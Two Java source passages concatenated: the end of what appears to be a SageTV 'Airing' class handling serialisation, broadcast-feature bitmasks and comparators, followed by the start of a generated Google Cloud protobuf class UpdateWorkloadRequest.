DURATION: id=" + id + " showID=" + showID + " time=" + time + " duration=" + duration + " mask=" + getMediaMaskString()); } partsB = in.readByte(); if (ver >= 0x4A) miscB = in.readInt(); else miscB = in.readByte() & 0xFF; prB = in.readByte(); if (ver >= 0x41) persist = in.readByte(); if (ver >= 0x4C && ver < 0x54) { int size = in.readShort(); in.skipBytes(size); // url bytes long foo = (ver >= 0x51) ? 
in.readLong() : in.readInt(); if (foo != 0) { in.readShort(); // price in.readInt(); // flags in.readInt(); // winstart if (ver >= 0x4E) { size = in.readShort(); in.skipBytes(size); // provider } } } } @Override void write(DataOutput out, int flags) throws IOException { super.write(out, flags); out.writeInt(showID); out.writeInt(stationID); out.writeLong(time); out.writeLong(duration); out.writeByte(partsB); out.writeInt(miscB); out.writeByte(prB); out.writeByte(persist); } @Override public Object clone() { Airing rv = (Airing) super.clone(); return rv; } public String getTitle() { if (getShow() == null) return Sage.rez("Invalid_Airing"); else return getShow().getTitle(); } // For music files public int getTrack() { return partsB & 0xFF; } // For picture files public int getOrientation() { return partsB & 0xFF; } @Override public String toString() { if (getShow() == null) return "BAD AIRING"; StringBuilder sb = new StringBuilder("A["); sb.append(id); sb.append(','); sb.append(showID); sb.append(",\""); sb.append(getShow().getTitle()); sb.append("\","); sb.append(stationID); sb.append('@'); sb.append(Sage.dfLittle(time)); sb.append(','); sb.append(duration/60000L); sb.append(','); sb.append(getMediaMaskString().trim()); sb.append(']'); return sb.toString(); } public boolean isHDTV() { return ((miscB & HDTV_MASK) == HDTV_MASK); } public boolean isCC() { return ((miscB & CC_MASK) == CC_MASK); } public boolean isStereo() { return ((miscB & STEREO_MASK) == STEREO_MASK); } public boolean isSubtitled() { return ((miscB & SUBTITLE_MASK) == SUBTITLE_MASK); } public boolean isSAP() { return ((miscB & SAP_MASK) == SAP_MASK); } public boolean isPremiere() { return ((miscB & PREMIERES_BITMASK) == PREMIERE_MASK); } public boolean isSeasonPremiere() { return ((miscB & PREMIERES_BITMASK) == SEASON_PREMIERE_MASK); } public boolean isSeriesPremiere() { return ((miscB & PREMIERES_BITMASK) == SERIES_PREMIERE_MASK); } public boolean isChannelPremiere() { return ((miscB & 
PREMIERES_BITMASK) == CHANNEL_PREMIERE_MASK); } public boolean isSeasonFinale() { return ((miscB & PREMIERES_BITMASK) == SEASON_FINALE_MASK); } public boolean isSeriesFinale() { return ((miscB & PREMIERES_BITMASK) == SERIES_FINALE_MASK); } public boolean is3D() { return ((miscB & THREED_MASK) == THREED_MASK); } public boolean isDD51() { return ((miscB & DD51_MASK) == DD51_MASK); } public boolean isDolby() { return ((miscB & DOLBY_MASK) == DOLBY_MASK); } public boolean isLetterbox() { return ((miscB & LETTERBOX_MASK) == LETTERBOX_MASK); } public boolean isLive() { return ((miscB & LIVE_MASK) == LIVE_MASK); } public boolean isNew() { return ((miscB & NEW_MASK) == NEW_MASK); } public boolean isWidescreen() { return ((miscB & WIDESCREEN_MASK) == WIDESCREEN_MASK); } public boolean isSurround() { return ((miscB & SURROUND_MASK) == SURROUND_MASK); } public boolean isDubbed() { return ((miscB & DUBBED_MASK) == DUBBED_MASK); } public boolean isTaped() { return ((miscB & TAPE_MASK) == TAPE_MASK); } public int getTotalParts() { return partsB & 0x0F; } public int getPartNum() { return (partsB >> 4) & 0x0F; } public void appendMiscInfo(StringBuilder sb) { boolean addComma = false; if ((partsB & 0x0F) > 1) { sb.append(Sage.rez("Part_Of_Parts", new Object[] { new Integer((partsB >> 4) & 0x0F), new Integer(partsB & 0x0F) })); addComma = true; } if (isCC()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Closed_Captioned")); addComma = true; } if (isStereo()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Stereo")); addComma = true; } if (isHDTV()) { if (addComma) sb.append(", "); sb.append(Sage.rez("HDTV")); addComma = true; } if (isSubtitled()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Subtitled")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SEASON_PREMIERE_MASK) { if (addComma) sb.append(", "); 
sb.append(Sage.rez("Season_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SERIES_PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Series_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == CHANNEL_PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Channel_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SEASON_FINALE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Season_Finale")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SERIES_FINALE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Series_Finale")); addComma = true; } if ((miscB & SAP_MASK) == SAP_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("SAP")); addComma = true; } if ((miscB & THREED_MASK) == THREED_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("3D")); addComma = true; } if ((miscB & DD51_MASK) == DD51_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("DD5.1")); addComma = true; } else if ((miscB & DOLBY_MASK) == DOLBY_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Dolby")); addComma = true; } if ((miscB & LETTERBOX_MASK) == LETTERBOX_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Letterbox")); addComma = true; } if ((miscB & LIVE_MASK) == LIVE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Live")); addComma = true; } if ((miscB & WIDESCREEN_MASK) == WIDESCREEN_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Widescreen")); addComma = true; } if ((miscB & SURROUND_MASK) == SURROUND_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Surround")); addComma = true; } if ((miscB & DUBBED_MASK) == DUBBED_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Dubbed")); addComma = true; } if ((miscB & TAPE_MASK) == TAPE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Taped")); addComma = true; } } public String getMiscInfo() { StringBuilder sb = new StringBuilder(); appendMiscInfo(sb); return 
sb.toString(); } public static byte getMiscBMaskForSearch(String str, boolean caseSensitive, boolean fullMatch) { return getMiscBMaskForSearch(null, str, caseSensitive, fullMatch); } public static byte getMiscBMaskForSearch(Pattern pat) { return getMiscBMaskForSearch(pat, null, false, false); } private static byte getMiscBMaskForSearch(Pattern pat, String str, boolean caseSensitive, boolean fullMatch) { int rv = 0; if (pat == null && (str == null || str.length() == 0)) return 0; if (pat == null && !caseSensitive) str = str.toLowerCase(); String test = Sage.rez("Closed_Captioned"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | CC_MASK; test = Sage.rez("Stereo"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | STEREO_MASK; test = Sage.rez("HDTV"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | HDTV_MASK; test = Sage.rez("Subtitled"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SUBTITLE_MASK; test = Sage.rez("SAP"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SAP_MASK; test = Sage.rez("3D"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && 
((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | THREED_MASK; test = Sage.rez("Dolby Digital 5.1"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DD51_MASK; test = Sage.rez("Dolby"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DOLBY_MASK; test = Sage.rez("Letterbox"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | LETTERBOX_MASK; test = Sage.rez("Live"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | LIVE_MASK; test = Sage.rez("New"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | NEW_MASK; test = Sage.rez("Widescreen"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | WIDESCREEN_MASK; test = Sage.rez("Surround"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SURROUND_MASK; test = Sage.rez("Dubbed"); if (pat == null && !caseSensitive) test = 
test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DUBBED_MASK; test = Sage.rez("Taped"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | TAPE_MASK; return (byte)(rv & 0xFF); } static byte getMiscBMaskForSearchNTE(String nteString) { int rv = 0; if (nteString == null || nteString.length() == 0) return 0; if (StringMatchUtils.wordMatchesNte("Closed_Captioned", nteString)) rv = rv | CC_MASK; if (StringMatchUtils.wordMatchesNte("Stereo", nteString)) rv = rv | STEREO_MASK; if (StringMatchUtils.wordMatchesNte("HDTV", nteString)) rv = rv | HDTV_MASK; if (StringMatchUtils.wordMatchesNte("Subtitled", nteString)) rv = rv | SUBTITLE_MASK; if (StringMatchUtils.wordMatchesNte("SAP", nteString)) rv = rv | SAP_MASK; if (StringMatchUtils.wordMatchesNte("3D", nteString)) rv = rv | THREED_MASK; if (StringMatchUtils.wordMatchesNte("Dolby Digital 5.1", nteString)) rv = rv | DD51_MASK; if (StringMatchUtils.wordMatchesNte("Dolby", nteString)) rv = rv | DOLBY_MASK; if (StringMatchUtils.wordMatchesNte("Letterbox", nteString)) rv = rv | LETTERBOX_MASK; if (StringMatchUtils.wordMatchesNte("Live", nteString)) rv = rv | LIVE_MASK; if (StringMatchUtils.wordMatchesNte("New", nteString)) rv = rv | NEW_MASK; if (StringMatchUtils.wordMatchesNte("Widescreen", nteString)) rv = rv | WIDESCREEN_MASK; if (StringMatchUtils.wordMatchesNte("Surround", nteString)) rv = rv | SURROUND_MASK; if (StringMatchUtils.wordMatchesNte("Dubbed", nteString)) rv = rv | DUBBED_MASK; if (StringMatchUtils.wordMatchesNte("Taped", nteString)) rv = rv | TAPE_MASK; return (byte)(rv & 0xFF); } public static byte[] getPremiereBValuesForSearch(String str, boolean caseSensitive, boolean fullMatch) { return 
getPremiereBValuesForSearch(null, str, caseSensitive, fullMatch); } public static byte[] getPremiereBValuesForSearch(Pattern pat) { return getPremiereBValuesForSearch(pat, null, false, false); } private static byte[] getPremiereBValuesForSearch(Pattern pat, String str, boolean caseSensitive, boolean fullMatch) { if (pat == null && (str == null || str.length() == 0)) return new byte[0]; List<Byte> rv = new ArrayList<Byte>(); if (pat == null && !caseSensitive) str = str.toLowerCase(); String test = Sage.rez("Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) PREMIERE_MASK); test = Sage.rez("Season_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SEASON_PREMIERE_MASK); test = Sage.rez("Series_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SERIES_PREMIERE_MASK); test = Sage.rez("Channel_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) CHANNEL_PREMIERE_MASK); test = Sage.rez("Season_Finale"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SEASON_FINALE_MASK); test = Sage.rez("Series_Finale"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != 
null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SERIES_FINALE_MASK); if (rv.isEmpty()) return new byte[0]; byte[] rb = new byte[rv.size()]; for (int i = 0; i < rb.length; i++) rb[i] = rv.get(i); return rb; } static byte[] getPremiereBValuesForSearchNTE(String nteString) { if (nteString == null || nteString.length() == 0) return new byte[0]; List<Byte> rv = new ArrayList<Byte>(); if ( StringMatchUtils.wordMatchesNte("Premiere", nteString)) rv.add((byte) PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Season_Premiere", nteString)) rv.add((byte) SEASON_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Series_Premiere", nteString)) rv.add((byte) SERIES_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Channel_Premiere", nteString)) rv.add((byte) CHANNEL_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Season_Finale", nteString)) rv.add((byte) SEASON_FINALE_MASK); if ( StringMatchUtils.wordMatchesNte("Series_Finale", nteString)) rv.add((byte) SERIES_FINALE_MASK); if (rv.isEmpty()) return new byte[0]; byte[] rb = new byte[rv.size()]; for (int i = 0; i < rb.length; i++) rb[i] = rv.get(i); return rb; } public String[] getRatingRestrictables() { List<String> v = new ArrayList<String>(); if (prB > 0) v.add(PR_NAMES[prB]); Show s = getShow(); if (s != null) { if (s.rated != null) v.add(s.rated.name); for (int i = 0; i < s.ers.length; i++) v.add(s.ers[i].name); } if (v.isEmpty()) v.add("Unrated"); if (stationID != 0) v.add(Integer.toString(stationID)); return v.toArray(Pooler.EMPTY_STRING_ARRAY); } public String getParentalRating() { return (prB > 0) ? 
PR_NAMES[prB] : ""; } void setPersist(byte how) { if (persist != how) { persist = how; Wizard.getInstance().logUpdate(this, Wizard.AIRING_CODE); } } int showID; int stationID; long time; long duration; byte partsB; int miscB; byte prB; byte persist; private transient Show myShow; public static final int CC_MASK = 0x01; public static final int STEREO_MASK = 0x02; public static final int HDTV_MASK = 0x04; public static final int SUBTITLE_MASK = 0x08; public static final int PREMIERES_BITMASK = 0x70; public static final int PREMIERE_MASK = 0x10; public static final int SEASON_PREMIERE_MASK = 0x20; public static final int SERIES_PREMIERE_MASK = 0x30; public static final int CHANNEL_PREMIERE_MASK = 0x40; public static final int SEASON_FINALE_MASK = 0x50; public static final int SERIES_FINALE_MASK = 0x60; public static final int SAP_MASK = 0x80; // For extended misc data public static final int THREED_MASK = 0x100; public static final int DD51_MASK = 0x200; public static final int DOLBY_MASK = 0x400; public static final int LETTERBOX_MASK = 0x800; public static final int LIVE_MASK = 0x1000; public static final int NEW_MASK = 0x2000; public static final int WIDESCREEN_MASK = 0x4000; public static final int SURROUND_MASK = 0x8000; public static final int DUBBED_MASK = 0x10000; public static final int TAPE_MASK = 0x20000; public static final byte PERSIST_TV_MEDIAFILE_LINK = 0x1; public static final byte TVY_VALUE = 1; public static final byte TVY7_VALUE = 2; public static final byte TVG_VALUE = 3; public static final byte TVPG_VALUE = 4; public static final byte TV14_VALUE = 5; public static final byte TVMA_VALUE = 6; public static final String[] PR_NAMES = { "", Sage.rez("TVY"), Sage.rez("TVY7"), Sage.rez("TVG"), Sage.rez("TVPG"), Sage.rez("TV14"), Sage.rez("TVM") }; public static final Comparator<Airing> SHOW_ID_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) 
return -1; return (a1.showID == a2.showID) ? Long.signum(a1.time - a2.time) : a1.showID - a2.showID; } }; /** * If start times are the same, sort by station ID. If the start times are different, sort by * start time. Sorting is low to high. */ public static final Comparator<Airing> TIME_CHANNEL_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) return -1; return (a1.time == a2.time) ? a1.stationID - a2.stationID : Long.signum(a1.time - a2.time); } }; /** * If station ID's are the same, the sort by start time. If station ID's are different, sort by * station ID. Sorting is low to high. */ public static final Comparator<Airing> CHANNEL_TIME_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) return -1; return (a1.stationID == a2.stationID) ? Long.signum(a1.time - a2.time) : a1.stationID - a2.stationID; } }; }
googleapis/google-cloud-java
35,810
java-assured-workloads/proto-google-cloud-assured-workloads-v1beta1/src/main/java/com/google/cloud/assuredworkloads/v1beta1/UpdateWorkloadRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/assuredworkloads/v1beta1/assuredworkloads.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.assuredworkloads.v1beta1; /** * * * <pre> * Request for Updating a workload. * </pre> * * Protobuf type {@code google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest} */ public final class UpdateWorkloadRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) UpdateWorkloadRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateWorkloadRequest.newBuilder() to construct. 
private UpdateWorkloadRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdateWorkloadRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdateWorkloadRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.class, com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.Builder.class); } private int bitField0_; public static final int WORKLOAD_FIELD_NUMBER = 1; private com.google.cloud.assuredworkloads.v1beta1.Workload workload_; /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the workload field is set. */ @java.lang.Override public boolean hasWorkload() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. 
* Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The workload. */ @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.Workload getWorkload() { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder getWorkloadOrBuilder() { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Required. The list of fields to be updated. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getWorkload()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getWorkload()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest)) { return super.equals(obj); } com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest other = (com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) obj; if (hasWorkload() != other.hasWorkload()) return false; if (hasWorkload()) { if (!getWorkload().equals(other.getWorkload())) return false; } if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } 
if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasWorkload()) { hash = (37 * hash) + WORKLOAD_FIELD_NUMBER; hash = (53 * hash) + getWorkload().hashCode(); } if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( 
com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request for Updating a workload. * </pre> * * Protobuf type {@code google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.class, com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.Builder.class); } // Construct using com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); 